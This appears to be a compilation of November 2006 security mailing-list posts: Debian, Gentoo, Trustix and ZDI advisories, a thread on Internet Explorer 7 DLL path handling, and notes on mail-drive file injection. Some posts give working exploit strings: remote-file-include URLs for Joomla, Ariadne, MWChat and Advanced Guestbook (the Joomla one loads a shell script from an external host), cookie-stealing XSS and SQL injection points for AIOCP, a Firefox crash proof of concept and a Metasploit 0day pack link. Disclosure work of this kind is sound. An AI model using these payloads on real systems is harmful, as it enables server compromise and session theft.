[SECURITY] [DSA 1206-1] New php4 packages fix several vulnerabilities
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1206-1[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff November 6th, 2006 http://www.debian.org/security/faq - -- Package: php4 Vulnerability : several Problem-Type : remote Debian-specific: no CVE ID : CVE-2005-3353 CVE-2006-3017 CVE-2006-4482 CVE-2006-5465 Several remote vulnerabilities have been discovered in PHP, a server-side, HTML-embedded scripting language, which may lead to the execution of arbitrary code. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2005-3353 Tim Starling discovered that missing input sanitising in the EXIF module could lead to denial of service. CVE-2006-3017 Stefan Esser discovered a security-critical programming error in the hashtable implementation of the internal Zend engine. CVE-2006-4482 It was discovered that str_repeat() and wordwrap() functions perform insufficient checks for buffer boundaries on 64 bit systems, which might lead to the execution of arbitrary code. CVE-2006-5465 Stefan Esser discovered a buffer overflow in the htmlspecialchars() and htmlentities(), which might lead to the execution of arbitrary code. For the stable distribution (sarge) these problems have been fixed in version 4:4.3.10-18. Builds for hppa and m68k will be provided later once they are available. For the unstable distribution (sid) these problems have been fixed in version 4:4.4.4-4 of php4 and version 5.1.6-6 of php5. We recommend that you upgrade your php4 packages. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10-18.dsc Size/MD5 checksum: 1686 b99c2dd2804c2bbc49e2ddf4552cc80c http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10-18.diff.gz Size/MD5 checksum: 280816 86bdd61412df9ca0b87a5f5aa536a610 http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10.orig.tar.gz Size/MD5 checksum: 4892209 73f5d1f42e34efa534a09c6091b5a21e Architecture independent components: http://security.debian.org/pool/updates/main/p/php4/php4-pear_4.3.10-18_all.deb Size/MD5 checksum: 25 8d364cb47cfbb8bb2472ca47812123e3 http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10-18_all.deb Size/MD5 checksum: 1144 26260bbbf8804b071cdf75ce70bde876 Alpha architecture: http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-18_alpha.deb Size/MD5 checksum: 1700934 1deff9409b11b01a88a805ca8726d3c3 http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-18_alpha.deb Size/MD5 checksum: 1698672 d91afe4bf274a9abc1227747765be8ca http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-18_alpha.deb Size/MD5 checksum: 3464908 2d3ac8b65a2650bbc60327043bb74cfa http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-18_alpha.deb Size/MD5 checksum: 1743098 0228c6cb6f305f473d0df08c61bfe10f http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-18_alpha.deb Size/MD5 checksum: 167916 02f6e85f6e12684c41f16cf908aa2a0e http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-18_alpha.deb Size/MD5 checksum:18148 3aa1ca7f556608a37d8dc6442cbc244e http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-18_alpha.deb Size/MD5 checksum: 325200 7126e4aa1ca42fd6e04a72ba782dc2e0 http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-18_alpha.deb Size/MD5 checksum:39036 28fc28ae9bf2b4ab091b7ae6687b027d http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-18_alpha.deb Size/MD5 checksum:34552 daa6539117567a4fffd1c8196426b3d7 http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-18_alpha.deb Size/MD5 checksum:38060 026c1fdd47d1cc9ff426427d5e04e5c6 http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-18_alpha.deb Size/MD5 checksum:21378 01d0e1b4abc53a4aff236bae15a3021c http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-18_alpha.deb Size/MD5 che
ZDI-06-037: America Online ICQ ActiveX Control Code Execution Vulnerability
ZDI-06-037: America Online ICQ ActiveX Control Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-06-037.html November 6, 2006 -- CVE ID: CVE-2006-5650 -- Affected Vendor: America Online -- Affected Products: America Online ICQ 5.1 -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since October 31, 2006 by Digital Vaccine protection filter ID 4725. For further product information on the TippingPoint IPS: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows attackers to execute arbitrary code on vulnerable installations of AOL ICQ. User interaction is not required to exploit this vulnerability. The specific flaw exists in the DownloadAgent function of the ICQPhone.SipxPhoneManager ActiveX control with the following CLSID: 54BDE6EC-F42F-4500-AC46-905177444300 The vulnerable function takes a single URI argument of a file to download and execute under the context of the running user. A malicious ICQ avatar can be used as an exploitation vector, allowing attackers to exploit this vulnerability by simply messaging a target ICQ user. -- Vendor Response: AOL has issued an update to correct this vulnerability on 10/31/2006. The update is automatically applied once connected to the ICQ service. -- Disclosure Timeline: 2006.09.20 - Vulnerability reported to vendor 2006.10.31 - Digital Vaccine released to TippingPoint customers 2006.11.06 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by Peter Vreugdenhil. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.
VulnDisco Pack for Metasploit
Hi, I am glad to announce that free version of VulnDisco Pack for Metasploit 2.7 is available for download. This release includes the following 0day exploits: vd_ldapinfo.pm - [0day] Query info from LDAP server vd_xlink.pm - [0day] Omni-NFS Enterprise remote exploit vd_openldap.pm - [0day] OpenLDAP DoS You can download it here: http://gleg.net/downloads/VULNDISCO_META_FREE.tar.gz For more info about VulnDisco Pack for Metasploit please visit: http://gleg.net/vulndisco_meta.shtml -- Best regards, Evgeny Legerov
Advanced Guestbook 2.3.1 (Admin.php) Remote File Include
#%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%# Advanced Guestbook 2.3.1 (Admin.php) Remote File Include #%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%# Author: BrokeN-ProXy Script : admin.php Found : www.hotscripts.com Risk: Dangerous Dork : "powered by: Advanced Guestbook 2.3.1" #%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%# Exploit: www.Site.com/[AGuest Path]/admin.php?include_path=Shell?cmd Notice: [AGuest Path] may be more than One, You are adviced to use the direct result os search. #%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%##%#%# GreestZ: nEt^DeViL[ My Best friend ] .:. RoDhEDoR .:. Linux_Drox .:. A-S-T [ Dr-Hacker ] .:. SnIpEr_SA .:. Eddy_BAck0o .:. Red Devils Crew[ â|Màëstrô ] .:. PROHacker .:. Devil-00 .:. Red_Casper .:. ReMoTeR .:. Le CoPrA .:. Mor0ccan Islam Defenders Team .:. Mr.Elgaarh .:. Team-Evil [ X-BLooD-X ] .:. MosT3mR .:. CracK_Man .:. b0rizQ .:. ThXGhost .:. 0sama_11_9 .:. nEt^vIrUS .:. -=MIZO=- And All Users in: www.3asfh.net/vb/ www.lezr.com/vb/ broken-proxy[at]Linuxmail[dot]org
XSS Vulnerability in Zend Framework Preview 0.2.0
Armorize Technologies Security Advisory Advisory No: Armorize-ADV-2006-0009 Status: Partial Date: 2006/11/03 Summary: Armorize-ADV-2006-0009 discloses cross-site scripting vulnerability that is found in the sample codes of Zend Framework (http://framework.zend.com/), which aims to provide a complete system for developing web applications powered by PHP 5. It is an architecture for developing entire applications with no other library dependencies. This code will always be actively developed, tested, and supported by Zend and the PHP Collaboration Project. Affected Software: ZendFramework Preview 0.2.0 Vulnerability Description: Cross Site Scripting Analysis/Impact: Privacy leakages from the client-side may lead to session hijacking, identity theft and information theft. Detection/Exploit(partial): ZendFramework-0.2.0/incubator/tests/Zend/Http/_files/testRedirections.php/?redirection=3&[ANY]=[XSS] Protection/Solution: 1. Escape every questionable URI and HTML script. 2. Remove prohibited user input. Credit: Security Team at Armorize Technologies, Inc. ([EMAIL PROTECTED]) Additional Information: Link to this Armorize advisory http://www.armorize.com/advisory.php?Keyword=Armorize-ADV-2006-0009 Links to all Armorize advisories http://www.armorize.com/advisory/ Links to Armorize vulnerability database http://www.armorize.com/resources/vulnerability.php Armorize Technologies is delivering the world's most advanced source code analysis solution for Web application security based on its award-winning and patent-pending verification technologies. Addressing security early in the software development life cycle (SDLC), Armorize CodeSecure proactively identifies and traces vulnerabilities in Web application source code, effectively hardening websites against today's ever growing security threats. CodeSecure's zero-false-positive accuracy, traceback support and Web 2.0-based interface make it the premium Web application security solution. For more information please visit: http://www.armorize.com.
[SECURITY] [DSA 1204-1] New ingo1 packages fix arbitrary shell command execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1204-1[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff November 2nd, 2006 http://www.debian.org/security/faq - -- Package: ingo1 Vulnerability : missing input sanitising Problem-Type : remote Debian-specific: no CVE ID : CVE-2006-5449 Debian Bug : 396099 It was discovered that the Ingo email filter rules manager performs insufficient escaping of user-provided data in created procmail rules files, which allows the execution of arbitrary shell commands. For the stable distribution (sarge), this problem has been fixed in version 1.0.1-1sarge1. For the unstable distribution (sid), this problem has been fixed in version 1.1.2-1. We recommend that you upgrade your ingo1 package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.1 alias sarge - Source archives: http://security.debian.org/pool/updates/main/i/ingo1/ingo1_1.0.1-1sarge1.dsc Size/MD5 checksum: 683 b8be1fc591da938deb08cb78a9d42f0d http://security.debian.org/pool/updates/main/i/ingo1/ingo1_1.0.1-1sarge1.diff.gz Size/MD5 checksum: 5161 358e14a64fe43a56cc1b9742f271c3ec http://security.debian.org/pool/updates/main/i/ingo1/ingo1_1.0.1.orig.tar.gz Size/MD5 checksum: 733108 509bf92a2ee44597d6ffd9a0a9b4a039 Architecture independent components: http://security.debian.org/pool/updates/main/i/ingo1/ingo1_1.0.1-1sarge1_all.deb Size/MD5 checksum: 760018 83f7044a2861f8e6aaea0c684fb2f6e0 These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce@lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.5 (GNU/Linux) iD8DBQFFSoLZXm3vHE4uyloRAmikAJ9wxVnvsfGUoJ2RMKPYHKhHj3ohPACfQkBf N/hCLdcpjKz+Q/Jz/VxGsZ0= =a886 -END PGP SIGNATURE-
TSLSA-2006-0061 - multi
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Trustix Secure Linux Security Advisory #2006-0061 Package names: mutt, pam_ldap, php Summary: Multiple vulnerabilities Date: 2006-11-03 Affected versions: Trustix Secure Linux 2.2 Trustix Secure Linux 3.0 Trustix Operating System - Enterprise Server 2 - -- Package description: mutt Mutt is a text mode mail user agent. Mutt supports color, threading, arbitrary key remapping, and a lot of customization. pam_ldap Pam_ldap is a module for Linux-PAM that supports password changes, V2/V3 clients, Netscapes SSL/OpenSSL, ypldapd, Netscape Directory Server password policies, access authorization, crypted hashes, etc. php PHP is an HTML-embedded scripting language. PHP attempts to make it easy for developers to write dynamically generated web pages. PHP also offers built-in database integration for several commercial and non-commercial database management systems, so writing a database-enabled web page with PHP is fairly simple. The most common use of PHP coding is probably as a replacement for CGI scripts. The mod_php module enables the Apache web server to understand and process the embedded PHP language in web pages. Problem description: mutt < TSL 3.0 > < TSL 2.2 > < TSEL 2 > - SECURITY Fix: A race condition in the safe_open function, when creating temporary files in an NFS filesystem, allows local users to overwrite arbitrary files due to limitations of the use of the O_EXCL flag on NFS filesystems. - The mutt_adv_mktemp function does not properly verify that temporary files that have been created with restricted permissions, which might allow local users to create files with weak permissions via a race condition between the mktemp and safe_fopen function calls. The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2006-5297 and CVE-2006-5298 to these issue. pam_ldap < TSL 3.0 > < TSL 2.2 > - New upstream. - SECURITY Fix: Steve Rigler has reported a security issue which can be exploited by malicious people to bypass certain security restrictions. The issue is caused due to an error within the handling of "PasswordPolicyResponse" control messages when authenticating against an LDAP server. This causes the "pam_authenticate()" function to always succeed, even if the previous authentication failed. The common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2006-5170 to this issue. php < TSL 3.0 > < TSL 2.2 > - New Upstream. - SECURITY Fix: Some vulnerabilities have been reported in PHP, caused due to boundary errors within the "htmlentities()" and "htmlspecialchars()" functions. If a PHP application uses these functions to process user-supplied input, this can be exploited to cause buffer overflows by passing specially crafted data to the affected application. The Common Vulnerabilities and Exposures project has assigned the name CVE-2006-5465 to this issue. - Added support for mcrypt, Bug #1956. - Added support for pdo-sqlite, pdo-mysql and sqlite, Bug #1959. - Included openssl support, Bug #1958. - Added buildrequires expat-devel and fontconfig-devel, Bug #2011. Action: We recommend that all systems with this package installed be upgraded. Please note that if you do not need the functionality provided by this package, you may want to remove it from your system. Location: All Trustix Secure Linux updates are available from http://http.trustix.org/pub/trustix/updates/> ftp://ftp.trustix.org/pub/trustix/updates/> About Trustix Secure Linux: Trustix Secure Linux is a small Linux distribution for servers. With focus on security and stability, the system is painlessly kept safe and up to date from day one using swup, the automated software updater. Automatic updates: Users of the SWUP tool can enjoy having updates automatically installed using 'swup --upgrade'. Questions? Check out our mailing lists: http://www.trustix.org/support/> Verification: This advisory along with all Trustix packages are signed with the TSL sign key. This key is available from: http://www.trustix.org/TSL-SIGN-KEY> The advisory itself is available from the errata pages at http://www.trustix.org/errata/trustix-2.2/> and http://www.trustix.org/errata/trustix-3.0/> or directly at http://www.trustix.org/errata/2006/0061/> MD5sums of the packages: - -- d96dae8b76785537380e77396b81c3c6 3.0/rpms/ldapclients-common-183-1tr.i586.rpm 7e4101d0079ef3d20aec6cd9a0ee47fc 3.0/rpms/mutt-1.4.2.1-10tr.i586.rpm a1a0ef53c02871c63a0f889d52e56464
Ariadne <= 2.4.1 Multiple Remote File Include Vulnerabilities(New)
*** # Title : Ariadne <= 2.4.1 Multiple Remote File Include Vulnerabilities # Author : ajann # Script Page : http://www.ariadne-cms.org/en/download/ # Vuln; *** [Files] loader.php loader.cmd.php [/Files] [Code,1] loader.php Error: .. require($ariadne."/configs/ariadne.phtml"); require($ariadne."/configs/ftp/$configfile"); require($ariadne."/configs/store.phtml"); require($ariadne."/includes/loader.ftp.php"); require($ariadne."/configs/sessions.phtml"); require($ariadne."/stores/".$store_config["dbms"]."store.phtml"); require($ariadne."/nls/en"); require($ariadne."/modules/mod_mimemagic.php"); require($ariadne."/modules/mod_virusscan.php"); .. Key [:] ariadne=[file] Key [:] store_config[code]=[file] \Example: http://target.com/path/ftp/loader.php?ariadne=Shell http://target.com/path/lib/includes/loader.cmd.php?store_config[code]=Shell # ajann,Turkey # ... # Im not Hacker!
RE: Internet Explorer 7 - Still Spyware Writers' Heaven
So all the malware writer has to do now is figure out how to do the initial exploit in the first place, that would then allow them to muck with path statements or place code in path executable areas. I mean, do you get it, yet? If the malware writer figures out how do the initial exploit, anything can be done, not just the path tricks. My WhereWindowsMalwareHides document(http://weblog.infoworld.com/securityadviser/archives/2006/05/up dated_where_w.html)contains over 145 different tricks and locations where malware can hide and live, along with the path trick. Your point is a valid point, but it's been a known issue for years. You can't skip over the hardest part, the initial exploit, and start picking on one of over a hundred ways to muck with Windows users and call "IE 7 a Spyware Writer's Heaven". I mean you can, but it looks like you're grasping at straws. At least tell us something new, and not something that's been documented for years. Roger -Original Message- From: Eliah Kagan [mailto:[EMAIL PROTECTED] Sent: Friday, November 03, 2006 9:26 PM To: full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com Subject: Re: Internet Explorer 7 - Still Spyware Writers' Heaven On 11/2/06, Roger A. Grimes wrote: > So, if you're statement is accurate that malware would need to be > placed in a directory identified by the PATH statement, we can relax > because that would require Administrator access to pull off. Admin > access would be needed to modify the PATH statement appropriately to > include the user's desktop or some other new user writable location or > Admin access would be needed to copy a file into the locations > indicated by the default PATH statement. It would not require *administrator* access--non-administrator users can still add things to their own PATHs, just not to the universal, system PATH. (See Control Panel > System > Advanced > Environment Variables.) -Eliah
Re: Internet Explorer 7 - Still Spyware Writers' Heaven
On 11/4/06, Joshua Gimer wrote: If Microsoft is not planning on providing a fix for this until Vista, I can see a worm coming from this. It's highly unlikely that this would be useful to the spreading of a worm. Worms infect computers over a network, relying either on remotely exploitable vulnerabilities that require no user interaction, or on vulnerabilities that require user interaction where it is easy to produce the necessary user action. Getting a malicious file into a user's path (or the system path) is nontrivial, and generally requires that something else be going on. Forgive me if I don't know how this works in the windows world, but when it is looking for this DLL, does it take the first one that it finds within your path; like in UNIX? Or does it look in all directories within your path and then decide? I am guessing the former, but I am just clarifying. It is the former--for libraries (DLLs) or executables (.exe, .com, .bat, .cmd, and so forth) the one that gets linked to or executed when the path is searched is the one that is in the earliest directory in the path (or the one that is in the working directory--unlike in *nix systems, in Windows the current directory--typically the directory that the calling program is located in--is searched first, before the path is consulted; you may see similar behavior in some *nix systems, but in such cases you will find that in actuality the directory "." is in the path). -Eliah
MajorSecurity Advisory #32]phpComasy CMS - Multiple Cross Site Scripting Issues
MajorSecurity Advisory #32]phpComasy CMS - Multiple Cross Site Scripting Issues
Details
===
Product: phpComasy CMS
Affected Version: <= 0.7.9 pre
Security-Risk: moderated
Remote-Exploit: yes
Vendor-URL: http://www.phpcomasy.org
Vendor-Status: informed
Advisory-Status: published
Credits
Discovered by: David Vieira-Kurz
http://www.majorsecurity.de
Original Advisory:
http://www.majorsecurity.de/index_2.php?major_rls=major_rls32
Introduction
phpComasy CMS is a Content Management System.
More Details
Cross Site Scripting:
Input passed directly to the "username" and "password" parameter in "index.php"
is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's
browser session in context of an affected site.
Fix
===
Version 0.8
Solution
=
Edit the source code to ensure that input is properly sanitised.
You should work with "htmlspecialchars()" or "htmlentities()" php-function to
ensure that html tags
are not going to be executed. Further it is recommend to set off the "register
globals" option in the
"php.ini" on your webserver.
Example:
$pass = htmlentities($_POST['pass']);
$test = htmlspecialchars($_GET('test'));
?>
History/Timeline
02.11.2006 discovery of the vulnerabilities
02.11.2006 additional tests with other versions
03.11.2006 contacted the vendor
04.11.2006 the vendor contacted me(response)
04.11.2006 vendor confirmed the bugs
05.11.2006 bugs have been fixed
06.11.2006 advisory is written
06.11.2006 advisory released
MajorSecurity
===
MajorSecurity is a German penetration testing and security research project
which consists of only one person at the present time.
I am looking for a sponsor.
You can find more Information on the MajorSecurity Project at
http://www.majorsecurity.de/
[ GLSA 200611-02 ] Qt: Integer overflow
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200611-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Qt: Integer overflow Date: November 06, 2006 Bugs: #151838 ID: 200611-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis An integer overflow flaw in the Qt pixmap handling could possibly lead to a Denial of Service or the remote execution of arbitrary code. Background == Qt is a cross-platform GUI toolkit, which is used e.g. by KDE. Affected packages = --- Package / Vulnerable / Unaffected --- 1 x11-libs/qt < 4.1.4-r2>= 4.1.4-r2 *>= 3.3.6-r4 Description === An integer overflow flaw has been found in the pixmap handling of Qt. Impact == By enticing a user to open a specially crafted pixmap image in an application using Qt, e.g. Konqueror, a remote attacker could be able to cause an application crash or the execution of arbitrary code with the rights of the user running the application. Workaround == There is no known workaround at this time. Resolution == All Qt 3.x users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=x11-libs/qt-3.3.6-r4" All Qt 4.x users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=x11-libs/qt-4.1.4-r2" References == [ 1 ] CVE-2006-4811 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4811 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200611-02.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: OpenPGP digital signature
Cross Site Scripting (XSS) Vulnerability in IBM WebSphere Application Server
Title: Cross Site Scripting (XSS) Vulnerability in IBM WebSphere
Application Server
ProCheckUp Security Bulletin
Description: IBM WebSphere Application Server is vulnerable to Cross
Site Scripting through a 'faultfactor' tag in the 500 Internal Server
Error page on port 8880 (default SOAP port).
Date found: 2005-02-27
Vulnerable: This has been tested on WebSphere Application Server version
6.x. Other versions may be vulnerable but this has not been verified.
Severity: Medium
Author: Nuri Fattah [EMAIL PROTECTED]
Vendor Status:
CVE Candidate: Not Assigned
Description:
WebSphere Application Server is vulnerable to a Cross Site Scripting
attack through the Internal Server Error page used on port 8880 of the
default WebSphere installation. This may allow the execution of
malicious script code in the browser of an individual who clicks on a
link to a site using the vulnerable version of WebSphere.
Information:
REQUEST:
GET /alert('Can%20Cross%20Site%20Attack') HTTP/1.1
Host: 192.168.1.195:8880
Connection: close
RESULTS:
HTTP/1.1 500 Internal Server Error
Server: WebSphere Application Server/6.0
Content-Type: text/xml; charset=utf-8
Content-Length: 3013
Connection: close
xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/";
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance";
xmlns:xsd="http://www.w3.org/2001/XMLSchema";>
ns0:JMXMessageVersion="1.0.0" ns0:JMXVersion="1.2.0">
[output omitted]
/alert('Can%20Cross%20Site%20Attack')
Consequences:
An attacker could cause the execution of malicious script code in the
client of an individual who clicks on a link to a site using the
vulnerable version of WebSphere Application Server.
Fix: IBM has released patches to address this issue. They have tracked
this vulnerability as APAR PK16602.
References: http://www.niscc.gov.uk/niscc/docs/re-20061031-00727.pdf?lang=en
Legal:
Copyright 2005 ProCheckUp Ltd. All rights reserved.
Permission is granted for copying and circulating this Bulletin to the
Internet community for the purpose of alerting them to problems, if and
only if the Bulletin is not changed or edited in any way, is attributed
to ProCheckUp, and provided such reproduction and/or distribution is
performed for non-commercial purposes.
Any other use of this information is prohibited. ProCheckUp is not
liable for any misuse of this information by any third party
MWChat pro V 7.0 <= (CONFIG[MWCHAT_Libs]) Remote File Include Vulnerability
MWChat pro V 7.0
Class = Remote File Inclusion
URL : http://www.appindex.net/products/download/?product=mwchat&version=7.0
Found by = Mr.3FReeT ..
code in :.
about.php , buddy.php , chat.php , dialog.php , head.php , help.php ,
index.php , license.php . nearly all :D
require_once("$CONFIG[MWCHAT_Libs]/security.php");
Exploit:
http://[target]/[path]/about.php?CONFIG[MWCHAT_Libs]=shellcode.txt?
http://[target]/[path]/buddy.php?CONFIG[MWCHAT_Libs]=shellcode.txt?
http://[target]/[path]/chat.php?CONFIG[MWCHAT_Libs]=shellcode.txt?
http://[target]/[path]/dialog.php?CONFIG[MWCHAT_Libs]=shellcode.txt?
http://[target]/[path]/head.php?CONFIG[MWCHAT_Libs]=shellcode.txt?
http://[target]/[path]/help.php?CONFIG[MWCHAT_Libs]=shellcode.txt?
http://[target]/[path]/index.php?CONFIG[MWCHAT_Libs]=shellcode.txt?
http://[target]/[path]/license.php?CONFIG[MWCHAT_Libs]=shellcode.txt?
Greetz : KuW SeC TeaM.. & ToOoFa , General C , Asbmay , Q8^RocK
...
_
FREE pop-up blocking with the new MSN Toolbar - get it now!
http://toolbar.msn.click-url.com/go/onm00200415ave/direct/01/
Joomla 1.0.11 Remote File Include
Author : Super-Crystal =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-== website: http://www.joomla.org/ =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--==-=-==-= Bug : include_once ( $mosConfig_absolute_path . '/language/'. $mosConfig_lang .'.php' ); =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--==-=-==-= Exploit : www.target.com/script_path/installation/index.php?mosConfig_absolute_path=http://www.arab4services.com/c-h.v2.txt? --> www.target.com/script_path/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.arab4services.com/c-h.v2.txt? Script Download http://forge.joomla.org/sf/frs/do/downloadFile/projects.joomla/frs.joomla_1_0.1_0_11/frs6654;jsessionid=860E9B227E096AAC4453A3B1FDCE77F5?dl=1 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Thanx : Arab4Services Team www.arab4services.com :)
Re: New Flaw in Firefox 2.0: DoS and possible remote code execution
[EMAIL PROTECTED] schrieb:
New Flaw in Firefox 2.0: DoS and possible remote code execution
PoC here: http://werterxyz.altervista.org/Firefox2Range.htm
function do_crash()
{
var range;
range = document.createRange();
range.selectNode(document.firstChild);
range.createContextualFragment('');
}
Good bye Firefox!
hi!
that works also under firefox v1.5.0.7.
regards
jan
AIOCP <=1.3.007 multiples vulnerabilities [sql , remote file include , xss]
AIOCP <=1.3.007 multiples vulnerabilities[injection sql , remote file include , xss] XSS get = - /public/code/cp_forum_view.php?fmode=top&topid='">alert(document.cookie) - /public/code/cp_forum_view.php?fmode=top&topid=53&forid='">alert(document.cookie) - /public/code/cp_forum_view.php?fmode=top&topid=53&forid=23&catid='">alert(document.cookie) - /public/code/cp_dpage.php?choosed_language='">alert(document.cookie) - /public/code/cp_forum_view.php?fmode=top&topid=53&forid='">alert(document.cookie) - /public/code/cp_forum_view.php?fmode=top&topid=53&forid=3&catid='">alert(document.cookie) - /public/code/cp_show_ec_products.php?order_field='">alert(document.cookie) - /public/code/cp_users_online.php?order_field='">alert(document.cookie) - /public/code/cp_links_search.php?orderdir='">alert(document.cookie) xss post in user profile : - signature - fiscal code remote file include = /admin/code/index.php?load_page=http%3A//google.com ( no login needed for the remote file include ) sql injection = - /public/code/cp_dpage.php?choosed_language=[sql] - /public/code/cp_news.php?choosed_language=[sql] - /public/code/cp_news.php?news_category=[sql] - /public/code/cp_forum_view.php?choosed_language=[sql] - /public/code/cp_edit_user.php?choosed_language=[sql] - /public/code/cp_newsletter.php?nlmsg_nlcatid=[sql] - /public/code/cp_newsletter.php?choosed_language=[sql] - /public/code/cp_links.php?links_category=[sql] - /public/code/cp_links.php?choosed_language=[sql] - /public/code/cp_contact_us.php?choosed_language=[sql] - /public/code/cp_show_ec_products.php?product_category_id=[sql] - /public/code/cp_show_ec_products.php?product_category_id=[sql] - /public/code/cp_show_ec_products.php?order_field=[sql] - /public/code/cp_login.php?choosed_language=[sql] - /public/code/cp_users_online.php?order_field=cpsession_expiry&submitted=1&firstrow=[sql] - /public/code/cp_codice_fiscale.php?choosed_language=[sql] - /public/code/cp_links_search.php?orderdir=[sql] full path disclosure = - /public/code/cp_dpage.php?choosed_language=eng&aiocp_dp[]=_main - /public/code/cp_show_ec_products.php?order_field[]= - /public/code/cp_show_page_help.php?hp[]= global risk = hight laurent gaffié & benjamin mossé http://s-a-p.ca/ [EMAIL PROTECTED]
Re: New Flaw in Firefox 2.0: DoS and possible remote code execution
3APA3A a écrit : Dear [EMAIL PROTECTED], NULL pointer dereference is not exploitable to code execution by itself. Hi, you should be interested by this http://metasploit.blogspot.com/2006/08/putting-fun-in-browser-fun.html + a little tool https://www.securinfos.info/outils-securite-hacking/uSEH.rar /JA
Mail Drives Security Considerations
Mail Drives Security Considerations === Author: Attila Gerendi (Darkz) Date: November 03, 2006 There are more "mail drive" solutions available like "GMail Drive", "GSpace", "Gmail FS", etc.. These systems are built to store ordinary files in email accounts (usually gmail because it's free 2Gb++ space). In some of these solutions the files and folders usually are stored as attachments in a special email. The file system does not have FAT (File Allocation Table) and the informations regarding the name and path of the files/folders are stored in the email SUBJECT field. Additionally there is no mechanism to filter these emails. So the problem is the remote attacker can shout blindly emails which describe a file or folder in this file systems and manipulate or inject files into that file system. This may be used for a new spam type or to inject undesirable/malicious files into someone's file collection. At the first sight this can not be worse then plain email spamming, however because this concept is extending the email use if no sanitation will be included then it will extend the spam use as well, some malicious people will find out new malicious solutions for particular or generic situations. A few examples are described below, other may exist. 1. viksoe's GMail Drive shell extension --- - file injection. You can inject files into the 